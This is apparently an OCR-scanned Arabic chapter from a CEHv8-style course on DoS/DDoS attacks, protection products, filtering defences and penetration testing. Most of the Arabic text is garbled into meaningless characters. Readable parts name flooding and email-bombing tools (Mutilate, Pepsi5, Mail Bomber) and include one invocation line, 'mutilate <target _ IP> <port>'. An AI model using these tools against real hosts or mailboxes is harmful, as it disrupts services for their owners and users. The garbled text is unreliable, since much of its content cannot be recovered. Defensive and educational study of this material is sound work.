.<£jjuo3l dlLlL&C 4_Sa^)C (j-a Ifrxla j ^ g II JJ^Jl 4-^^>^> £^<J AjjUa/Jl CjLd^Jl < fljiaJj tAjj^Jl ^J^Jj g li < te 5^ c ' (J^ 

Arbor Pravail: Availability Protection System 

http : //www . arbornetworks . com : j^-a^ll 
<j^aUJl ajj^JI CjU^kJI c_jUi JjS UjUIj DDoS Jia Al^Ull j 4i j^xJI djl^j^ill 3J'j]j ^ Arbor Pravail 
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DoS/DDoS Protection Tool 

DoS/DDoS Protection Tool: D-Guard Anti-DDoS Firewall ik 
'Super DDoS 'DoS/DDoS ±± <oSj .o" uUa ±± U^JI J jj D-Guard Anti-DDoS Firewall 
'Mutation UDP 'UDP 'IP Flooding Attacks 'SYN Flooding Attacks 'Fragment Attacks 'DrDoS 
.jJI 'ARP Spoofing Attacks 'Random UDP Flooding 'ICMP Flood Attacks 'ICMP 

.DDOS 0* c?>i fcljftlj 'SYN, TCP Flooding ±± o 

.TCP Ji* c> f^ 1 O 

UDP/ICMP/IGMP P >JI Jj~ Sjb] O 

.IP Jl *LJajjll ^Ajlall j *b jjJI <*jla]l O 

r - t 




M«oit 






















. a r ■ , 






to 


^1 v» 


. £3 — 



J 



J 



J 



DoS/DDoS Protection Tools * 

<jL Uij .DoS/DDoS ^ ji j3 ^1 j&\ c> ^ ^ ^D-Guard Anti-DDoS Firewall J\ 4it^VU 

: j^jli DoS/DDoS ^ ^ ^ j-ftl 

NetFlow Analyzer available at http://www.manageengine.com 
SDL Regex Fuzzer available at http://www.microsoft.com 
WANGuard Sensor available at http://www.andrisoft.com 
NetScaler Application Firewall available at http : //www . citrix . com 
FortGuard DDoS Firewall available at http://www.fortguard.com 
IntruGuard available at http ://www .intruguard. com 
DefensePro available at http : //www . rad ware . com 
DOS arrest available at http://www.dosarrest.com 
Anti DDoS Guardian available at http : //w w w .beethink. com 
DDoSDefend available at http://ddosdefend.com 
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Techniques to Defend Against Botnets 

•Ciii jA\ .Ua ^AA^l (Jjia ^jujt 

RFC 3104 Filtering ± 

<jt jixJl <j^aj^aa^> t^JL^a Ujl^a JjfL LJLa>J ^ j^J! jl jA jjlall li$J <AxAjJ$\ djLUalalt .ACL J& RFC3704 

^^ajoij U s^lc .L^jljjjiJI (jijj l" allocated address space" 

f jaJl Jaliuij c^Llxi ;4_aj\I3I £>1a IP (JJjLc; ^ Ij^lS tit ."bOgOn list" 4_pLJt d)LLi*Jt jUat J l$Jt jlaii jl jLaJ 

4 jq> ^i^l j-a jill tiA ^AaJLujJ lij Li AjAajJ (j^aLklt ISP J^Vilt L_L^j Liajt .(jjj jjujl-g IP j,"U i>^)iict j *LLg ^Ld^lill 

^Lt^Vt J 6 ^ Bogon list (j^l^JI djj^yi 4-^Lt Jt 4_iaa jit jjj>Jt J j^ <J^ 4-A^uJt 

Black Hole Filtering *k 



jjisJI jjj^t JalLiij .^Ld^kll cjL^a ^lJ ^UILj cdijj jJI ^jja ^la^ll Black Hole Filtering 

.RTBH 'Remotely Triggered Black Hole Filtering fc* ^ ^UJI aja^I J^jj jt JjS l^ja ^j&j* 

.RTBH S^Lai^j ^:^Jt l-l=^ CjL^a L-uaJ 4j^Lk b^Loj .t*L ^-aUJt ISP <>l jSlb jSlill li* pi j^j ^Ij^j 

DDoS Prevention Offerings from ISP or DDoS Service 
ci£L^aj3 "in-the-cloud DDoS protection" o*j^ ^J^JI <jUuoJI Jll^t ^SH ciij jjjVI CjU^l (j^jj* 

(j^aLklt dljjljVI Jj^J ^j) <Jj3 dljjljVI ^Ld^ ^ <-l^ L>* ^ (S f^J > u JJ^Jl ^^>^ (J' *J^*^ J (J^l^Jl CljjljVt 

Cisco IPS Source IP Reputation Filtering 

<1jU WVI c^ljUki^V! <ips 7.0 t> ^ 'Cisco Global Correlation 

4 C jj*aA$JI JjuoLoi^ iC±i jjjVI cjl^j^ill Jj^ djUjkJI AilS c^j^ Cisco SensorBase Network 

Jja ^jj.aa.I^.aII ajL ols! 4£jJo3I ^l^klaa! ^ IPS .botnet harvesters j ^ CjI^jJoII tSjLjal! ^1 jJI jLoujl 
.l^oUaj a^LlSI ^j^jII djLLj ^^ic (J^Lulj <j| c^Luj Cj5 j -laLulllI ^l<i j c ^ ,3^1^!! jj^VI ^^^ic ^ j^^l 



(Dos/DDoS Penetration Testing) Jlj^VI jbSil 10.9 



Denial-of-Service (DOS) Attack Penetration Testing 

£>i& ( a- - gall Jalaj j3 jJ La£ lg^.!>L^a! <!jLa^j 4_iL<»VI 1 ' 6 * - ^ali Jallj ^^ic JjisJl Jj^j (jl ( ; Vjl 6tiL <j^aLkll A^jJall (j^Ul <!jL^xi ^ 

^j-d ^->.>UJ^)3l L_fl^Jlj _<£jjuo3l a\ a V ^1x^.1^13 jLud-a 

djl ftj^S ^^ic laj (^jIIj ^^cjjuj jjc. ping j' SYN (>< ^ J^jj (j^^A 3 ^ ^ ^ ^ ' . ^ ^ r* j^ ■■V^ ^ .cJ^^VI 

.<LtLoV! cjI^suI! ^^ic jjSi*U ^l^-ftll JLtii ^lii^j ^ jjoi tiljli t^ljlkVl j;*^ o tdij .DoS vulnerabilities t ^ 1 u ^ 
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Cj| jiaaJI (j* 4_LaiLuj Ajutla Jl £"tlaj &b& (j-G -ja-vlU ^Ja^j l— )>IaJ jl <La,laJl ^^a^a CA s fj^. ^UajJt (jl£ bj U» -jo-vlM J| ^-tlaJ 
<j* UiLajl jll ja/tft -kii*kj3! Jc; tih&LuiJ liA . jblkVI (j* cJ^Jl ^J^J JjljikVI jt^aj ^ J Jj^ * 

? jt*J! Jp JUa&l jblkl :2 S jfeaJI 4- 

jJjllLuj fil£La^a Jc ^Jaii 4il .pbVlj jlj£LuiVI jLla.V (J^f*aJ jl ^LaJl J ^^cliLj^l ^-^J (j^J 3 (jC <J-aaJl jtiia.1 \) a " ^JJ 

;4JU3l CjIj^VI fl lalJ J ^La. Jc U jlila.1 ^ 

cil^Laij l^ji .dujjjVl A^f^ J^ Ajlaall Ls iA\ j ^1 jaJ *bVI j J-aa^ll jIjI^V j-^jj iWebserver Stress Tool 

c> "load testing" <JaU±> J^aJI jUikV .(^S ji<JI) ^UJI J^aJI J <4«3 ^ jUlkV t*U .lU*JI jbikl *bl J 

." (real- world) 

.SSL/TLS ct^jj^ ^ jljSUj *bl jLia.V t*U sbt > :Web Stress Tester 

JMeter 

http : //j meter, apache . org 

a axu^a liLa. (j^flaj j& sbVI oaa l^lxjjaj <^^j ^3 ^<JI ^1^1 jUlkV djjijVl 4£jjuj ^^ic ^ jlLa (j^flaj JIVIeter 

.*bV! a-Uaj lU^I ^3 jL> jU^V 

4_JU3| CjIj^VI .4£jjuo3I (J^aaa (Jj^ia (jC <xi^aJl ( . La a ^ ja^J L_axjJall JsIaj ^^Ic <J gaai] ^Uaill c3^-^ ( ♦ ^ J J^ 1 ^^ j;*^ a 

^jlj^aJlj t JjxjuHII .ial_L<Jl d^A (^Ic (Jasu CjUi^aJlj tiallxJl <!La. Ls lc Jj5*ll l^l^ajjoal (j^J obi j& iNlIiap 

,A_L<i jjuj^)3I ^a^ajjauJl 4-g-aJ j ^nlaj£ jl j^l jVl ^ajuj ^j-<» Nmap l!^*-^ .CjLajoi^Jl j AjjUII 

GFI LANguard ^> cjU^I c j^j cj^i J^Uj ^1 sbl :GFI LANguard 

^Uaill ^glc l^a.1 jJ <^Ll! L_kstjJa3l Jallj <J ja. (j^^aJjab<Jl ^Lnlij tS^Aa^a JP ^JjjUc <C a jl XP £)\ bUluai ;4£jjaJl ^aaij 

CjUUJI 6 asset profiling 'configuration auditing J^j .u^j^^j ( ^ ^ :Nessus 

^jliJI Jp SYN :4 SjIaiJI 4- 

.PHP DoS <Sprut ^DoS HTTP :SYN 0^ Vl^l U\^\ ch\ 
^jliJI Jp "port flooding" iiiall ^ cjUU^I cjU^a JJuij : 5 S jkkJl J_ 

^^jaLiJ^)]! ^pa^iJlj . liLoll b^ Jc 4^^aJl ^j-d ^jU»^)aJl (j^a.J '(j^*-^ Jj UDP TCP ^3^" L>^ (J^J^ ^fllall CjULjajS 

Jc ^ j^-jl I^A ^JJ (jl (j^J .^100 Jj ^j^J-^^ 4_aJlsLxJl S*la.j laJLujj o^Ujj JlAxlaj!>l! 4_aJU^ jjc. ialixJl cJ*^ f J?^^ ^ L>^ 

;iall<Jl CjU > ^ ^jaJ^ pi ja.V AJUll CjIjjVI ^h^unl .UDPj TCP 

j-aVl ^l^ajjajl .TCP/IP ^l^ua t-fl^ioij obVl .lJ^JI Jc^ 5ja jjLJI iflUJ! ^j^j3 LajLajl ^^laaj :Mutilate 

Mutilate J^l 

mutilate <target _ IP> <port> 

J Jaxj ^1 sbVI 

^Uajaa A\ \ >^>^^o Laa j b^ J^j^j UDP L-fl^laaj Pepsi5 ^bl :Pepsi5 

uH j^i cf^^ ^i^«JI ^jojI plia.y stealth J^*-^ ^ J ^laJl 
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^j>£Wt jjjJI ?SL± "email bomber" <^jj2£NI jjjJI *i3t5 J^u : 6 SjkaJl ^ 

Mail Bomber 

http://www.getfreefilexom/bomber.html : j^iJI 
tSlljliVI (JjjLujI fbv^U ajjLoJI ^ jj^V' iJjI^j J^jjV >v^>»n ^UJI sbl ^ Mail Bomber 

^jjJI JjU jj QtlJ Z \ * s>i\A aj^jJI ^jIjSII c> ^ ^ ^ SjiS ^ ."subscription-based mailing lists" 

.0^3! c-ifc~J SMTP ^ >j <cP JJ^V 1 
Advanced Mail Bomber 
http : //www . sof theap .com : j^-a^ll 

lJIjS <> dijjijVI ^ ^ij^ ^ (jj^ji^JI (j* ji& n*l aj^l^ JjL-j JL-jj I jiS Advanced Mail Bomber 
ji^i ^Aili^xJI xj > >>1 ^<JI 48 SMTP ^ 48 cJ^^ ^ ^ lW-*^ t^j^ ^-^^ %^*a 

.jj-G^kluuJI cjLLiLu ^iii Liajl ^j^dj sbVl *>i& .^31 4<J^jM 'SMTP ^1 ^ V jffi^ <x±*jA\ 
"Flood the website forms and guestbook with bogus entries" (j^J J^M jtjjJt J^J ^Ij^]) Jljfel :7 SjkaJ) J_ 

jj^J Aijjj :8 S jla^l i- 



^IjaII dlL ^li ^ Ujflj JU^I Ija ^ djS JlsSrt ^SSSl .CEHv8 

- Internet Denial of Service: Attack and Defense Mechanisms By Jelena Mirkovic 

- DDoS SURVIVAL HANDBOOK 

- An Investigation into the Detection and Mitigation of Denial of Service (DoS) 

- Denial of Service attacks and mitigation techniques by SANS 

- Internet Denial of Service Attacks and Defense Mechanisms By mehmud abliz 

- Malware, Rootkits & Botnets A Beginner's Guide 

- Other information from other website 
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